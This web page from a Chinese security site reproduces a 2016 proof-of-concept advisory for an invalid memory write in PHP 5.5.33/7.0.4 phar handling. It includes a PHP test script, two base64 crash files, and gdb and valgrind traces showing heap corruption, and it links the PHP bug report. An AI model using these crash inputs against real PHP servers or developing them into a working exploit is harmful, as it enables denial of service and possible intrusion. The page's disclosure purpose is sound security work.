首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP 5.5.33 - Invalid Memory Write
来源:@vah_13 作者:vah_13 发布时间:2016-04-05  
# Exploit Title: Invalid memory write in phar on filename with \0 in name
# Date: 2016-03-19
# Exploit Author: @vah_13
# Vendor Homepage: https://secure.php.net/
# Software Link: https://github.com/php/php-src
# Version: 5.5.33
# Tested on: Linux
 
 
 
Test script:
---------------
cat test.php
-------------------
<?php
$testfile = file_get_contents($argv[1]);
try {
    $phar = new Phar($testfile);
    $phar['index.php'] = '<?php echo "https://twitter.com/vah_13 ?>';
    $phar['index.phps'] = '<?php echo "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"; ?>';
    $phar->setStub('<?php
Phar::webPhar();
__HALT_COMPILER(); ?>');
} catch (Exception $e) {
        print $e;
}?>
----------------------------------------------------------------------------------
 
PoC 1
 
root@TZDG001:/tmp/data2# base64 ret/crash13
CkTJu4AoZHKCxhC7KlDNp2g5Grx7JE092+gDAADJVR1EZS8vL/oAAPovLy8v5y8vLy9lZWVlZWVl
DAwMC+MMDAwMDM4MDAwgBwwMDAwMDAxQDC8uLi8jLy88Ly8u+C8vLxERERERERERpXRDbnQgdGhh
dCBtVnJrV3h4eHh4eNt4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4ePh4Ly8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLkYvLy8vLy8vLy8vLy9kJy8vLy8vLy8vLy8v8+TzMZovLysvLy8vL3l5eXl5
eXl5eXkpIHsEAAYgICAveHh4eHh4eHh4eAF4AAJ4eP8vIExvYWQgY29tbWFuZChTgG5lIHV0aWxp
dHkKICAgIGluY2yKZGUuLi4uLi4uLi4uPCYuLi4ucG1kLnBoYXIudmVKCiAgJCAvLyBSdegDIGxp
bmUgTW50ZXJmYWxlCiAgIBxleGkAAP//SFBNRFxUZXh0VUl5Q29tbWFuZAAANwAAAHNyY1Rf/39N
UElMRVIodjsgPz4MChAAAAANAgAAEP//+QEAAAAAAAAiAAAqAAAAlnJjL21haW4vlA8uLlEvci8u
LhAA2GVzZXRzL2NsZWFucipeTUxSZW5kZXLJYEC2IQAAAABjb3JlrgAAAAAAI2OcwrYAAAAAAA0A
NwAAAHMASRwAc2V0cy91bndzcmMAnjgjW7gwgAAAcmMAAgAAADN1bGVzZXRzL2MgAAAAb///f/9p
YWwueG1s4BIAAB+u4VZzcmMvbWFpbi9yZXNvdXJpZ24ueABzcmMvbQA9dr2itiEASRyXl5eXl5eX
l5etl5eXlwAMc3JjL21hW24v6Bvzb3VyY2VzL3J1//+AAHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0
dHR0dHR0WWV0cy9uYRwcMBwcHBwcHBwcAB+u4TSoCwD1A3lvdXJjZXMvdmVsb2Qxmi9LZ01yAB+u
4RgAACCu4VbjDy5nLnhtbP8vAC4uLjwmLnh4eHh4eHh4eHh4+HgZLy8vLi4ucG1kLnBoL3Jlc291
cmNjZXNzcgCAAAAuGnVzc3IvLg0AAHFF7BMAc3JjL/9haW4vcGhwL1BIUE1EL1BhcnMnJycnJycn
JycnJycnJyfnAAAKQ5bxci5waHBtGAAAH67hGAAAH67hVuMPLi5RLy8vLy8vc3JW4QcAANevurC2
IQAAAAcAACwvdXNyLy4uL1KHAK78Vm4vcGhwL1BIUE1EL1JlbmRlcmVyKl5NTFJlbmRlcslgQLYh
AAAAAAAAGwABAHNyYy9tYWluL3BoNy9QSFBNRC9SdVRlLnCAcDIYAAAfruEAAHNyYy9tYWluL3AA
iy0AAABzcmMAAFeu4VYwCAAAPXa9oi8vLy8vLy8vLy8vLy8vLy8vL28v8+TzOoAAAGhwL1D/CzpE
ZXZlbG9kMZovbmdNZXRob2QQcGiKlgwAIAAAAFb8BQAAI2OcwrYhAAAAACAANwAAAGNyYy9tYc7O
zs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs4AEa7hVnNyYy+A////L9YhzLYhAADg////MXBo
cC9QSFBNRC9PdW1hf24vcGhwL1BIUGFEUFBQUFBQUFByYy9tYWluL3BocC9QSFBNRC9SdWxML0Rl
c2lnZy9Ub29PYW55TWV0aG9kfy4fruFWYy9tYWluL3BocC9QSFBNRC9SdWxlL0Rlc2lnbi8vRGV2
ZWxvZFxlbnRDbwMAAGMvbQA9dr2itiEASRwAcG1kLnARruFWjwUF//8FcIWYAAIAAAAvLi4v////
/3JILi4vLi91c3IvLi4AADYAAABecmMvUEhQTUQvUnVsZS9EZXNpZ1svV2VpAGhwAAAAc3JjLy8v
LwAAAQDk8zGaLy//L1J1bGUvRJCQkJBAkJCQkJDQkJBzkJCQkJCQkJCQkJCQkJCQkG50cm9w6HAu
LgAAAQAuLi4uLi4uLi4uL1BIUE1EL091bWFpdi9waHAvUEhQTURlcgAEQ2hpbGRyZW4ucGhwbQsA
AB+u4VZ+BQAAgLP4+7Yh3////wAOAAAfruxWbQYAADplbi4vdf//Ly4u5i4vdQBkHwAD6AAD6AAN
ADcuLhAA2DUAAAAyAAAAc3JkLy8uLi8uL1Jzci4vdXNycGguUS8vLy9/AAAAL3Vzci+uQi8uL3Vz
ci8vLi98c3IvLhciLi91c3IvLi4vdXOALy4uL/////9ldHMvYyAAAABv//9//2lhbC54tbW1tbW1
tbW1tbW1vABjL+ZJTnUgZC4vc5QPAAAEAHIvLi4vdXNyLy4uLy4vdXNyLy4AZC4vAQAAAC4uL3UQ
AC8uLi8uL3Vzby4vdXNyDy4uUS8vLy8vL3NyLy4vc3IvLi4odXNyAAIAAC4vdXNzci8uLi91e3Iv
rkIvLmRvci9hdRAA2DVXu7YhABcuL3Vzci8uAS8u
 
 
(gdb) r  test.php ret/crash13
Starting program: /tmp/php-7.0.4/sapi/cli/php test.php ret/crash13
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
 
Program received signal SIGSEGV, Segmentation fault.
zend_string_init (persistent=0, len=2, str=0x121a64c "->") at
/tmp/php-7.0.4/Zend/zend_string.h:157
157    zend_string *ret = zend_string_alloc(len, persistent);
(gdb) i r
rax            0xae6572  11429234
rbx            0x7fffffffa880  140737488332928
rcx            0x64c  1612
rdx            0x2  2
rsi            0x3  3
rdi            0xae658a  11429258
rbp            0x2  0x2
rsp            0x7fffffffa7e0  0x7fffffffa7e0
r8             0xfffffffffffffffb  -5
r9             0x1  1
r10            0x3  3
r11            0x1214fc0  18960320
r12            0x1206b7a  18901882
r13            0x4  4
r14            0x121a64c  18982476
r15            0x7fffffffa880  140737488332928
rip            0xd531b4  0xd531b4 <add_assoc_string_ex+116>
eflags         0x10206  [ PF IF RF ]
cs             0x33  51
ss             0x2b  43
ds             0x0  0
es             0x0  0
fs             0x0  0
gs             0x0  0
 
*****************************************************************
 
PoC 2
 
root@dns:~/php-src# base64 ./bck_out/6648
Ly4vdXNyLy4uLy4vdXNy4uLi4uLi4uLi4uLi4uLi4uLi4uLit7e3t7dhI1VmbH8AIGdsb1Rh/39i
b25ziGFudCB0AYCAIG1QX1CKRQAAgABFQVMsJywgJ3BoYXInKXNfLy4uLy4vU3NyLy4uL31zci8u
LjwuL3Vzci8ubWFxUGhhciggJ3Bokm1kLnBoYXIAAAB/CgovL4iInoiIiIiIiIh1Li9//+ggQ29u
ZmlndXJcB2lCY2x1ZC91c3IvLoiJiIiIiKKIiIiIXFxcXFxHXFxcXFxcXFxcXFxciA0uL3VzcmUg
cC8uLi91c3IvLi4uL3MQLy4ULxEvgHNyNiBpbmNsdWQv9G8gdXNcIHRoaXMgcGhhctlzZXRfaW5j
iYgmMSYmJiY4/e3t7WFyI2VmaW5lIGdsb1T/FhYWFhYWFhYWFhYWFhYWFhYWFhYWaGFyJyk7Co5k
ZV9wYXRoKCkpOxYKaWYgKGlzjn+UKCRhcmV2KSAmJiByZWEvdXNyLy4QLy4vdXNyLy4uL31zci8u
LjwuL3Vzci8u5i91c3IvLi4vLi91c3IuLj0ndXNyLy4uEADJci8uJi8uL3VzEC9AEhwuL3NyLy4u
L3Vzci8uLi8uL2lziz4uLi8uL3Vzci8oLi91bmNsdWQvdVNyLy6IiIikiIiIcwAgLi5y3zouLy4v
JiYmJlMmJiYmOBDt7e0=
 
 
./bck_out/6648
 
==4103== Source and destination overlap in memcpy(0x6e5d800, 0x6e5d798, 291)
==4103==    at 0x4C2D75D: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915)
==4103==    by 0x6AD1B5: _estrdup (zend_alloc.c:2558)
==4103==    by 0x6880FD: php_stream_display_wrapper_errors (streams.c:152)
==4103==    by 0x68AE4B: _php_stream_opendir (streams.c:1994)
==4103==    by 0x5E986A: spl_filesystem_dir_open (spl_directory.c:236)
==4103==    by 0x5ED77F: spl_filesystem_object_construct (spl_directory.c:724)
==4103==    by 0x6C1655: zend_call_function (zend_execute_API.c:878)
==4103==    by 0x6EBF92: zend_call_method (zend_interfaces.c:103)
==4103==    by 0x5A44A8: zim_Phar___construct (phar_object.c:1219)
==4103==    by 0x75D143: ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER
(zend_vm_execute.h:1027)
==4103==    by 0x70CFBA: execute_ex (zend_vm_execute.h:423)
==4103==    by 0x76D496: zend_execute (zend_vm_execute.h:467)
==4103==
==4103== Invalid read of size 8
==4103==    at 0x6ACEC3: zend_mm_alloc_small (zend_alloc.c:1291)
==4103==    by 0x6ACEC3: zend_mm_alloc_heap (zend_alloc.c:1362)
==4103==    by 0x6ACEC3: _emalloc (zend_alloc.c:2446)
==4103==    by 0x6DC4E0: zend_hash_real_init_ex (zend_hash.c:140)
==4103==    by 0x6DC4E0: zend_hash_check_init (zend_hash.c:163)
==4103==    by 0x6DC4E0: _zend_hash_add_or_update_i (zend_hash.c:563)
==4103==    by 0x6DC4E0: _zend_hash_str_update (zend_hash.c:667)
==4103==    by 0x6D21FE: zend_symtable_str_update (zend_hash.h:407)
==4103==    by 0x6D21FE: add_assoc_str_ex (zend_API.c:1384)
==4103==    by 0x6E8AA6: zend_fetch_debug_backtrace
(zend_builtin_functions.c:2670)
==4103==    by 0x6EDB3A: zend_default_exception_new_ex (zend_exceptions.c:213)
==4103==    by 0x6D1DBA: _object_and_properties_init (zend_API.c:1311)
==4103==    by 0x429178: zend_throw_exception (zend_exceptions.c:877)
==4103==    by 0x4292A5: zend_throw_error_exception (zend_exceptions.c:910)
==4103==    by 0x42639C: php_error_cb (main.c:1041)
==4103==    by 0x427F4B: zend_error (zend.c:1163)
==4103==    by 0x426FFD: php_verror (main.c:897)
==4103==    by 0x427306: php_error_docref1 (main.c:921)
==4103==  Address 0x5c5c5c5c5c5c5c5c is not stack'd, malloc'd or
(recently) free'd
==4103==
==4103==
==4103== Process terminating with default action of signal 11 (SIGSEGV)
==4103==  General Protection Fault
==4103==    at 0x6ACEC3: zend_mm_alloc_small (zend_alloc.c:1291)
==4103==    by 0x6ACEC3: zend_mm_alloc_heap (zend_alloc.c:1362)
==4103==    by 0x6ACEC3: _emalloc (zend_alloc.c:2446)
==4103==    by 0x6DC4E0: zend_hash_real_init_ex (zend_hash.c:140)
==4103==    by 0x6DC4E0: zend_hash_check_init (zend_hash.c:163)
==4103==    by 0x6DC4E0: _zend_hash_add_or_update_i (zend_hash.c:563)
==4103==    by 0x6DC4E0: _zend_hash_str_update (zend_hash.c:667)
==4103==    by 0x6D21FE: zend_symtable_str_update (zend_hash.h:407)
==4103==    by 0x6D21FE: add_assoc_str_ex (zend_API.c:1384)
==4103==    by 0x6E8AA6: zend_fetch_debug_backtrace
(zend_builtin_functions.c:2670)
==4103==    by 0x6EDB3A: zend_default_exception_new_ex (zend_exceptions.c:213)
==4103==    by 0x6D1DBA: _object_and_properties_init (zend_API.c:1311)
==4103==    by 0x429178: zend_throw_exception (zend_exceptions.c:877)
==4103==    by 0x4292A5: zend_throw_error_exception (zend_exceptions.c:910)
==4103==    by 0x42639C: php_error_cb (main.c:1041)
==4103==    by 0x427F4B: zend_error (zend.c:1163)
==4103==    by 0x426FFD: php_verror (main.c:897)
==4103==    by 0x427306: php_error_docref1 (main.c:921)
Segmentation fault
 
Program received signal SIGSEGV, Segmentation fault. zend_mm_alloc_small
(size=<optimized out>, bin_num=16, heap=0x7ffff6000040) at
/root/php_bck/Zend/zend_alloc.c:1291 1291 heap->free_slot[bin_num] =
p->next_free_slot; (gdb) i r rax 0x5c5c5c5c5c5c5c5c 6655295901103053916 rbx
0x8 8 rcx 0x10 16 rdx 0x7ffff60000c0 140737320583360 rsi 0x10 16 rdi 0x120
288 rbp 0x7ffff6000040 0x7ffff6000040 rsp 0x7fffffffa230 0x7fffffffa230 r8
0xf74460 16204896 r9 0x7ffff6013170 140737320661360 r10 0x0 0 r11 0x101 257
r12 0x7ffff605c658 140737320961624 r13 0x7ffff605c640 140737320961600 r14
0x7ffff60561f8 140737320935928 r15 0x8439b8 8665528 rip 0x6acec3 0x6acec3
<_emalloc+115> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0
es 0x0 0 fs 0x0 0 gs 0x0 0
 
 
https://bugs.php.net/bug.php?id=71860
 
https://twitter.com/vah_13
 
https://twitter.com/ret5et
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP 7.0.4/5.5.33 - SNMP Format
·Xion Audio Player <= 1.5 (buil
·Apache Jetspeed Arbitrary File
·Hexchat IRC Client 2.11.0 - CA
·LShell <= 0.9.15 - Remote Code
·Hexchat IRC Client 2.11.0 - Di
·ATutor 2.2.1 Directory Travers
·PCMAN FTP Server 2.0.7 Buffer
·TallSoft SNMP TFTP Server 1.0.
·Easy File Sharing HTTP SerEasy
·OS X Kernel Use-After-Free and
·Internet Explorer - MSHTML!CSV
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved